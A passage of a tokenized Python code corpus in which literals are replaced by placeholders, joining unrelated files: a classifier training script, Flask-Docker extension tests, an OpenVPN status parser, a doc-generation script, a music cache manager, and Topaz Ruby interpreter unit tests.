"<STR_LIT>" . format ( Path . RESULT_PATH , self . run_name ) ) <EOL> classifier . relevance . output_statistics ( "<STR_LIT>" . format ( Path . RESULT_PATH ) , self . run_name ) <EOL> def cross_validation ( self , iteration = <NUM_LIT:100> , neurons_per_layer = [ <NUM_LIT> , <NUM_LIT> ] , k = <NUM_LIT:5> ) : <EOL> classifier = self . get_classifier ( neurons_per_layer ) <EOL> classifier . k_fold_cross_validate ( k , iteration ) <EOL> classifier . relevance . output_confusion_matrix ( "<STR_LIT>" . format ( Path . RESULT_PATH , self . run_name ) ) <EOL> classifier . relevance . output_statistics ( "<STR_LIT>" . format ( Path . RESULT_PATH ) , self . 
run_name ) <EOL> classifier . relevance . output_mean_square_mean_error ( "<STR_LIT>" . format ( Path . RESULT_PATH , self . run_name ) , k ) <EOL> def predict ( self , session_id ) : <EOL> self . process ( session_id ) <EOL> classifier = Recurrent ( ) <EOL> classifier . retrieve_sample ( "<STR_LIT>" . format ( Path . FEATURE_PATH , session_id ) , is_labelled = False ) <EOL> classifier . evaluate ( is_labelled = False ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> argv = sys . argv [ <NUM_LIT:1> : ] <EOL> length = len ( argv ) <EOL> if length < <NUM_LIT:1> : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> else : <EOL> mode = argv [ <NUM_LIT:0> ] <EOL> if mode == "<STR_LIT>" : <EOL> main = Main ( ) <EOL> if length == <NUM_LIT:2> : <EOL> main . process ( argv [ <NUM_LIT:1> ] ) <EOL> elif length > <NUM_LIT:2> : <EOL> s = argv [ <NUM_LIT:1> ] <EOL> m = argv [ <NUM_LIT:2> ] <EOL> a = { "<STR_LIT:g>" : False , "<STR_LIT:a>" : False } <EOL> for i in xrange ( <NUM_LIT:0> , len ( m ) , <NUM_LIT:2> ) : <EOL> c = m [ i ] + m [ i + <NUM_LIT:1> ] <EOL> sensor = c [ <NUM_LIT:0> ] <EOL> strategy = c [ <NUM_LIT:1> ] <EOL> a [ sensor ] = True if strategy == '<STR_LIT:y>' else False <EOL> main . process_all ( s , a ) <EOL> else : <EOL> main . 
process_all ( ) <EOL> elif mode == "<STR_LIT>" : <EOL> statistical = argv [ <NUM_LIT:1> ] <EOL> preprocessing = argv [ <NUM_LIT:2> ] <EOL> heuristic = argv [ <NUM_LIT:3> ] <EOL> use_statistical_features = False <EOL> preprocess_signal = True <EOL> use_heuristic_segmentation = False <EOL> if statistical == '<STR_LIT:y>' : <EOL> use_statistical_features = True <EOL> if preprocessing == '<STR_LIT:n>' : <EOL> preprocess_signal = False <EOL> if heuristic == '<STR_LIT:y>' : <EOL> use_heuristic_segmentation = True <EOL> main = Main ( use_statistical_features = use_statistical_features , preprocess_signal = preprocess_signal , use_heuristic_segmentation = use_heuristic_segmentation ) <EOL> main . process_all ( ) <EOL> elif mode == "<STR_LIT>" and length == <NUM_LIT:2> : <EOL> main = Main ( ) <EOL> main . predict ( argv [ <NUM_LIT:1> ] ) <EOL> else : <EOL> main = Main ( argv [ <NUM_LIT:1> ] ) <EOL> if mode == "<STR_LIT:train>" : <EOL> if length == <NUM_LIT:3> : <EOL> main . train ( int ( argv [ <NUM_LIT:2> ] ) ) <EOL> elif length > <NUM_LIT:3> : <EOL> main . train ( int ( argv [ <NUM_LIT:2> ] ) , [ int ( x ) for x in argv [ <NUM_LIT:3> : ] ] ) <EOL> else : <EOL> main . train ( ) <EOL> main . evaluate ( ) <EOL> elif mode == "<STR_LIT>" : <EOL> if length == <NUM_LIT:3> : <EOL> main . cross_validation ( int ( argv [ <NUM_LIT:2> ] ) ) <EOL> elif length > <NUM_LIT:3> : <EOL> main . cross_validation ( int ( argv [ <NUM_LIT:2> ] ) , [ int ( x ) for x in argv [ <NUM_LIT:3> : ] ] ) <EOL> else : <EOL> main . cross_validation ( ) <EOL> elif mode == "<STR_LIT>" : <EOL> main . evaluate ( ) </s>
<s> from flask import Flask , current_app <EOL> from flask_docker import Docker <EOL> from pytest import fixture , raises <EOL> import responses <EOL> docker = Docker ( ) <EOL> def create_app ( ) : <EOL> app = Flask ( __name__ ) <EOL> docker . init_app ( app ) <EOL> return app <EOL> @ fixture <EOL> def app ( request ) : <EOL> app = create_app ( ) <EOL> ctx = app . app_context ( ) <EOL> ctx . push ( ) <EOL> request . addfinalizer ( ctx . pop ) <EOL> return app <EOL> def test_factory ( ) : <EOL> assert docker . app is current_app <EOL> def test_out_of_context ( ) : <EOL> docker . app <EOL> with raises ( RuntimeError ) as error : <EOL> docker . app . name <EOL> assert error . value . args [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> with raises ( RuntimeError ) as error : <EOL> docker . client <EOL> assert error . value . args [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> def test_url_missing ( app ) : <EOL> with raises ( RuntimeError ) as error : <EOL> docker . client <EOL> assert error . value . args [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> @ responses . activate <EOL> def test_versioned ( app ) : <EOL> responses . add ( <EOL> responses . GET , '<STR_LIT>' , <EOL> body = '<STR_LIT>' , status = <NUM_LIT:200> , <EOL> content_type = '<STR_LIT:application/json>' ) <EOL> app . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> app . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> assert docker . client . info ( ) == { '<STR_LIT:message>' : '<STR_LIT>' } <EOL> def test_lazy_creation ( app ) : <EOL> app . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> assert app . extensions [ '<STR_LIT>' ] is None <EOL> client1 = docker . client <EOL> client2 = docker . client <EOL> assert app . extensions [ '<STR_LIT>' ] is client1 is client2 <EOL> def test_isolation ( ) : <EOL> app1 = create_app ( ) <EOL> app2 = create_app ( ) <EOL> app1 . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> app2 . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> docker1 = None <EOL> docker2 = None <EOL> with app1 . 
app_context ( ) : <EOL> docker1 = docker . client <EOL> with app2 . app_context ( ) : <EOL> docker2 = docker . client <EOL> assert docker1 is not docker2 </s>
<s> from __future__ import unicode_literals , absolute_import <EOL> import datetime <EOL> import collections <EOL> import ipaddress <EOL> from six import python_2_unicode_compatible as unicode_compatible <EOL> from humanize . filesize import naturalsize <EOL> DATETIME_FORMAT_OPENVPN = '<STR_LIT>' <EOL> def parse_time ( time ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( time , datetime . datetime ) : <EOL> return time <EOL> return datetime . datetime . strptime ( time , DATETIME_FORMAT_OPENVPN ) <EOL> def parse_peer ( peer ) : <EOL> if isinstance ( peer , PeerAddress ) : <EOL> return peer <EOL> host , port = peer . rsplit ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> return PeerAddress ( ipaddress . ip_address ( host ) , int ( port ) ) <EOL> def parse_filesize ( size ) : <EOL> if isinstance ( size , FileSize ) : <EOL> return size <EOL> return FileSize ( size ) <EOL> @ unicode_compatible <EOL> class PeerAddress ( collections . namedtuple ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> """<STR_LIT>""" <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' . format ( self . host , self . port ) <EOL> @ unicode_compatible <EOL> class FileSize ( int ) : <EOL> """<STR_LIT>""" <EOL> def __str__ ( self ) : <EOL> return self . humanize ( ) <EOL> def humanize ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return naturalsize ( self , ** kwargs ) </s>
<s> __version__ = "<STR_LIT:1.0>" </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import os , sys <EOL> from apigen import ApiDocWriter <EOL> from distutils . version import LooseVersion as V <EOL> def abort ( error ) : <EOL> print ( '<STR_LIT>' % error ) <EOL> exit ( ) <EOL> def assert_source_and_install_match ( package ) : <EOL> """<STR_LIT>""" <EOL> module = sys . modules [ package ] <EOL> installed_version = V ( module . version . version ) <EOL> setup_lines = open ( '<STR_LIT>' ) . readlines ( ) <EOL> for l in setup_lines : <EOL> if l . startswith ( '<STR_LIT>' ) : <EOL> source_version = V ( l . split ( "<STR_LIT:'>" ) [ <NUM_LIT:1> ] ) <EOL> break <EOL> if source_version != installed_version : <EOL> abort ( "<STR_LIT>" ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> package = '<STR_LIT>' <EOL> try : <EOL> __import__ ( package ) <EOL> except ImportError as e : <EOL> abort ( "<STR_LIT>" ) <EOL> outdir = '<STR_LIT>' <EOL> docwriter = ApiDocWriter ( package ) <EOL> docwriter . package_skip_patterns += [ r'<STR_LIT>' , <EOL> r'<STR_LIT>' , <EOL> ] <EOL> docwriter . write_api_docs ( outdir ) <EOL> docwriter . write_index ( outdir , '<STR_LIT>' , relative_to = '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' % len ( docwriter . written_modules ) ) </s>
<s> from sqlalchemy . orm . exc import NoResultFound <EOL> from shiva import models as m <EOL> from shiva . app import db <EOL> from shiva . utils import get_logger <EOL> q = db . session . query <EOL> log = get_logger ( ) <EOL> class CacheManager ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ram_cache = True , use_db = True ) : <EOL> log . debug ( '<STR_LIT>' ) <EOL> if not ram_cache : <EOL> log . debug ( '<STR_LIT>' ) <EOL> self . ram_cache = ram_cache <EOL> self . use_db = use_db <EOL> self . artists = { } <EOL> self . albums = { } <EOL> self . hashes = set ( ) <EOL> def get_artist ( self , name ) : <EOL> artist = self . artists . get ( name ) <EOL> if not artist : <EOL> if self . use_db : <EOL> try : <EOL> artist = q ( m . Artist ) . filter_by ( name = name ) . one ( ) <EOL> except NoResultFound : <EOL> pass <EOL> if artist and self . ram_cache : <EOL> self . add_artist ( artist ) <EOL> return artist <EOL> def add_artist ( self , artist ) : <EOL> if self . ram_cache : <EOL> self . artists [ artist . name ] = artist <EOL> def get_album ( self , name , artist ) : <EOL> album = self . albums . get ( artist . name , { } ) . get ( name ) <EOL> if not album : <EOL> if self . use_db : <EOL> try : <EOL> album = q ( m . Album ) . filter_by ( name = name ) . one ( ) <EOL> except NoResultFound : <EOL> pass <EOL> if album and self . ram_cache : <EOL> self . add_album ( album , artist ) <EOL> return album <EOL> def add_album ( self , album , artist ) : <EOL> if self . ram_cache : <EOL> if not self . albums . get ( artist . name ) : <EOL> self . albums [ artist . name ] = { } <EOL> self . albums [ artist . name ] [ album . name ] = album <EOL> def add_hash ( self , hash ) : <EOL> if self . ram_cache : <EOL> self . hashes . add ( hash ) <EOL> def hash_exists ( self , hash ) : <EOL> if hash in self . hashes : <EOL> return True <EOL> if self . use_db : <EOL> return bool ( q ( m . Track ) . filter_by ( hash = hash ) . 
count ( ) ) <EOL> return False <EOL> def clear ( self ) : <EOL> self . artists = { } <EOL> self . albums = { } <EOL> self . hashes = set ( ) </s>
<s> from nose import tools as nose <EOL> import unittest <EOL> from mock import Mock <EOL> from shiva import app <EOL> class AppTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> app . app . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> app . app . run = Mock ( ) <EOL> def test_main ( self ) : <EOL> app . main ( ) <EOL> nose . assert_true ( app . app . run . called ) </s>
<s> import os <EOL> import time <EOL> import pytest <EOL> from . . base import BaseTopazTest <EOL> class TestKernel ( BaseTopazTest ) : <EOL> def test_puts_nil ( self , space , capfd ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> out , err = capfd . readouterr ( ) <EOL> assert out == "<STR_LIT:\n>" <EOL> def test_print ( self , space , capfd ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> out , err = capfd . readouterr ( ) <EOL> assert out == "<STR_LIT>" <EOL> def test_p ( self , space , capfd ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> out , err = capfd . readouterr ( ) <EOL> assert out == "<STR_LIT>" <EOL> def test_lambda ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> w_cls , w_lambda = space . listview ( w_res ) <EOL> assert w_cls is space . w_proc <EOL> assert w_lambda is space . w_true <EOL> def test_proc ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> w_cls , w_lambda = space . listview ( w_res ) <EOL> assert w_cls is space . w_proc <EOL> assert w_lambda is space . w_false <EOL> def test_singleton_methods ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ ] <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ "<STR_LIT:foo>" ] <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ [ "<STR_LIT:foo>" ] , [ ] ] <EOL> def test_raise ( self , space ) : <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT:foo>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT:foo>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT:foo>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> space . 
execute ( """<STR_LIT>""" ) <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( """<STR_LIT>""" ) <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> def test_overriding_raise ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ '<STR_LIT:foo>' ] <EOL> def test_raise_error_subclass ( self , space ) : <EOL> with self . raises ( space , "<STR_LIT>" , '<STR_LIT:foo>' ) : <EOL> space . execute ( """<STR_LIT>""" ) <EOL> def test_Array ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ [ "<STR_LIT>" ] , [ "<STR_LIT>" ] ] <EOL> assert self . unwrap ( space , space . execute ( "<STR_LIT>" ) ) == [ <NUM_LIT:1> ] <EOL> def test_String ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) == [ "<STR_LIT:hello>" , "<STR_LIT:4>" ] <EOL> def test_Integer ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) == [ <NUM_LIT:4> , <NUM_LIT> ] <EOL> def test_exit ( self , space ) : <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> def test_block_given_p ( self , space ) : <EOL> assert space . execute ( "<STR_LIT>" ) is space . w_false <EOL> assert space . execute ( "<STR_LIT>" ) is space . w_false <EOL> assert space . execute ( "<STR_LIT>" ) is space . w_false <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ False , True ] <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ False , True ] <EOL> def test_eqlp ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . 
unwrap ( space , w_res ) == [ True , False ] <EOL> def test_eval ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:6> <EOL> def test_responds_to ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) == [ False , True ] <EOL> def test_Float ( self , space ) : <EOL> assert space . float_w ( space . execute ( "<STR_LIT>" ) ) == <NUM_LIT:1.0> <EOL> assert space . float_w ( space . execute ( "<STR_LIT>" ) ) == <NUM_LIT> <EOL> assert space . float_w ( space . execute ( "<STR_LIT>" ) ) == <NUM_LIT> <EOL> assert space . float_w ( space . execute ( "<STR_LIT>" ) ) == <NUM_LIT> <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert space . float_w ( w_res ) == <NUM_LIT> <EOL> def test_loop ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> def test_sleep ( self , space ) : <EOL> now = time . time ( ) <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:0> <EOL> assert time . time ( ) - now >= <NUM_LIT> <EOL> now = time . time ( ) <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:0> <EOL> assert time . time ( ) - now >= <NUM_LIT> <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> def test_trust ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) is False <EOL> w_res = space . 
execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ True , True , True ] <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ False , False , False ] <EOL> def test_taint ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) is False <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ True , True , True ] <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ False , False , False ] <EOL> def test_freeze ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) is False <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ True , False , True ] <EOL> def test_backtick ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) == "<STR_LIT>" <EOL> def test_backtick_sets_process_status ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == "<STR_LIT>" <EOL> class TestRequire ( BaseTopazTest ) : <EOL> def test_simple ( self , space , tmpdir ) : <EOL> f = tmpdir . join ( "<STR_LIT>" ) <EOL> f . write ( """<STR_LIT>""" ) <EOL> w_res = space . execute ( """<STR_LIT>""" % f ) <EOL> assert space . int_w ( w_res ) == - <NUM_LIT:5> <EOL> def test_no_ext ( self , space , tmpdir ) : <EOL> f = tmpdir . join ( "<STR_LIT>" ) <EOL> f . write ( """<STR_LIT>""" ) <EOL> w_res = space . execute ( """<STR_LIT>""" % str ( f ) [ : - <NUM_LIT:3> ] ) <EOL> assert space . int_w ( w_res ) == - <NUM_LIT:9> <EOL> def test_load_path ( self , space , tmpdir ) : <EOL> f = tmpdir . join ( "<STR_LIT>" ) <EOL> f . write ( """<STR_LIT>""" ) <EOL> w_res = space . execute ( """<STR_LIT>""" % tmpdir ) <EOL> assert space . 
int_w ( w_res ) == - <NUM_LIT:3> <EOL> def test_stdlib_default_load_path ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert w_res is space . w_true <EOL> def test_nonexistance ( self , space ) : <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> def test_already_loaded ( self , space , tmpdir ) : <EOL> f = tmpdir . join ( "<STR_LIT>" ) <EOL> f . write ( """<STR_LIT>""" ) <EOL> w_res = space . execute ( """<STR_LIT>""" % ( f , f , f ) ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:1> <EOL> def test_load ( self , space , tmpdir ) : <EOL> f = tmpdir . join ( "<STR_LIT>" ) <EOL> f . write ( """<STR_LIT>""" ) <EOL> w_res = space . execute ( """<STR_LIT>""" % ( f , f , f ) ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:3> <EOL> def test_no_ext_on_path ( self , space , tmpdir ) : <EOL> f = tmpdir . join ( "<STR_LIT>" ) <EOL> f . write ( """<STR_LIT>""" ) <EOL> w_res = space . execute ( """<STR_LIT>""" % f ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:5> <EOL> def test_null_bytes ( self , space ) : <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> space . execute ( '<STR_LIT>' ) <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> space . execute ( """<STR_LIT>""" ) <EOL> def test_load_path_element_coerce ( self , space , tmpdir ) : <EOL> f = tmpdir . join ( "<STR_LIT>" ) <EOL> f . write ( """<STR_LIT>""" ) <EOL> w_res = space . execute ( """<STR_LIT>""" % tmpdir ) <EOL> assert w_res is space . w_true <EOL> def test_path_ambigious_directory_file ( self , space , tmpdir ) : <EOL> f = tmpdir . join ( "<STR_LIT>" ) <EOL> f . write ( """<STR_LIT>""" ) <EOL> tmpdir . join ( "<STR_LIT:t>" ) . ensure ( dir = True ) <EOL> w_res = space . execute ( """<STR_LIT>""" % ( tmpdir , tmpdir . join ( "<STR_LIT:t>" ) ) ) <EOL> assert w_res is space . 
w_true <EOL> class TestExec ( BaseTopazTest ) : <EOL> def fork_and_wait ( self , space , capfd , code ) : <EOL> cpid = os . fork ( ) <EOL> if cpid == <NUM_LIT:0> : <EOL> try : <EOL> space . execute ( code ) <EOL> finally : <EOL> os . _exit ( <NUM_LIT:0> ) <EOL> else : <EOL> os . waitpid ( cpid , <NUM_LIT:0> ) <EOL> out , err = capfd . readouterr ( ) <EOL> return out <EOL> def test_exec_with_sh ( self , space , capfd ) : <EOL> out = self . fork_and_wait ( space , capfd , "<STR_LIT>" ) <EOL> assert out == "<STR_LIT>" <EOL> def test_exec_directly ( self , space , capfd ) : <EOL> out = self . fork_and_wait ( space , capfd , "<STR_LIT>" ) <EOL> assert out == "<STR_LIT>" <EOL> def test_exec_with_custom_argv0 ( self , space , capfd ) : <EOL> out = self . fork_and_wait ( space , capfd , "<STR_LIT>" ) <EOL> assert out == "<STR_LIT>" <EOL> @ pytest . mark . xfail <EOL> def test_exec_with_path_search ( self , space , capfd ) : <EOL> out = self . fork_and_wait ( space , capfd , "<STR_LIT>" ) <EOL> assert out == "<STR_LIT>" <EOL> def test_exec_with_null_bytes ( self , space ) : <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> space . execute ( '<STR_LIT>' ) <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> space . execute ( '<STR_LIT>' ) <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> space . execute ( '<STR_LIT>' ) <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> space . execute ( '<STR_LIT>' ) <EOL> class TestSetTraceFunc ( BaseTopazTest ) : <EOL> def test_class ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . 
unwrap ( space , w_res ) == [ <EOL> [ "<STR_LIT>" , "<STR_LIT>" , <NUM_LIT:3> , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , <NUM_LIT:7> , None , None ] , <EOL> [ "<STR_LIT:class>" , "<STR_LIT>" , <NUM_LIT:7> , None , None ] , <EOL> [ "<STR_LIT:end>" , "<STR_LIT>" , <NUM_LIT:7> , None , None ] , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , <NUM_LIT:10> , None , None ] , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , <NUM_LIT:10> , "<STR_LIT>" , "<STR_LIT>" ] <EOL> ] </s>
<s> from . . base import BaseTopazTest <EOL> class TestRegexpObject ( BaseTopazTest ) : <EOL> def test_source ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . str_w ( w_res ) == "<STR_LIT:abc>" <EOL> def test_compile_regexps ( self , space ) : <EOL> space . execute ( """<STR_LIT>""" ) <EOL> def test_regexp_syntax_errors ( self , space ) : <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( """<STR_LIT>""" ) <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( """<STR_LIT>""" ) <EOL> def test_regexp_compile_errors ( self , space ) : <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( """<STR_LIT>""" ) <EOL> def test_regexp_new_errors ( self , space ) : <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( """<STR_LIT>""" ) <EOL> def test_to_s ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . str_w ( w_res ) == "<STR_LIT>" <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . str_w ( w_res ) == "<STR_LIT>" <EOL> def test_match_operator ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ <NUM_LIT:2> , "<STR_LIT:l>" , "<STR_LIT:l>" , "<STR_LIT:o>" , "<STR_LIT:a>" , "<STR_LIT:b>" , "<STR_LIT:c>" , "<STR_LIT:h>" , "<STR_LIT:e>" , "<STR_LIT:l>" , "<STR_LIT>" , "<STR_LIT:l>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> def test_match_method ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:1> <EOL> def test_match_begin ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . 
int_w ( w_res ) == <NUM_LIT:1> <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:2> <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:4> <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> def test_match_end ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:7> <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:6> <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:6> <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> def test_new_regexp ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert w_res is space . w_true <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . str_w ( w_res ) == "<STR_LIT:abc>" <EOL> def test_allocate ( self , space ) : <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> def test_size ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:4> <EOL> def test_set_match_data_wrong_type ( self , space ) : <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> space . execute ( "<STR_LIT>" ) <EOL> def test_atomic_grouping ( self , space ) : <EOL> w_res = space . execute ( '<STR_LIT>' ) <EOL> assert w_res is space . w_nil <EOL> w_res = space . execute ( '<STR_LIT>' ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:0> <EOL> w_res = space . execute ( '<STR_LIT>' ) <EOL> assert self . unwrap ( space , w_res ) == [ "<STR_LIT>" ] <EOL> def test_set_intersection ( self , space ) : <EOL> w_res = space . 
